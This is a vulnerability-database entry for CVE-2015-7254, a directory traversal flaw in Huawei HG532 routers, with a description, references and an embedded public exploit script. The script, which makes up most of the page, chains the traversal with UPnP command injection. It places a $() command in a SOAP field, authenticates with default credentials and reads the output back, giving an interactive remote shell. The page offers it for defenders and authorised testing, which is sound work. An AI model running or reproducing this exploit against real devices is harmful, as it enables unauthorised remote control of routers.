CVE-2015-7254
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
6.0
Description
Directory traversal vulnerability on Huawei HG532e, HG532n, and HG532s devices allows remote attackers to read arbitrary files via a .. (dot dot) in an icon/ URI.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Huawei Router HG532e - Command Execution
#!/bin/python
'''
Author : Rebellion
Github : @rebe11ion
Twitter : @rebellion
'''
import urllib2,requests,os,sys
from requests.auth import HTTPDigestAuth
DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
DEFAULT_TIMEOUT = 5
def fetch_url(url):
global DEFAULT_HEADERS, DEFAULT_TIMEOUT
request = urllib2.Request(url, headers=DEFAULT_HEADERS)
data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
return data
def exploit(ip, path):
url = "http://%s:37215/icon/../../../%s" % (ip, path)
data = fetch_url(url)
return data
def main():
pwd = "/"
cmd_path = "/tmp/ccmd"
pwd_path = "/tmp/cpwd"
while True:
targetip = sys.argv[1]
cmd_ = raw_input("[{}]$ ".format(pwd))
cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)
rm = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"
requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
assert cmd_path.startswith("/"), "An absolute path is required"
data = exploit(targetip, cmd_path)
open(cmd_path,"wb").write(data)
if "cd" in cmd_:
pass
elif "clear" in cmd_:
os.system("clear")
elif "cat" in cmd_:
os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))
else:
if "|" in cmd_:
os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))
else:
os.system("cat {}".format(cmd_path))
pwd = exploit(targetip,pwd_path).strip("\n")
if __name__ == "__main__":
main()References
- http://www.huawei.com/en/psirt/security-advisories/hw-462908
- http://www.kb.cert.org/vuls/id/438928
- http://www.securityfocus.com/bid/77506
- http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-462908.htm
- https://github.com/0xAdrian/scripts/blob/master/2015_7254_exploit.py
- https://www.exploit-db.com/exploits/45991/
- http://www.huawei.com/en/psirt/security-advisories/hw-462908
- http://www.kb.cert.org/vuls/id/438928
- http://www.securityfocus.com/bid/77506
- http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-462908.htm
- https://github.com/0xAdrian/scripts/blob/master/2015_7254_exploit.py
- https://www.exploit-db.com/exploits/45991/
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.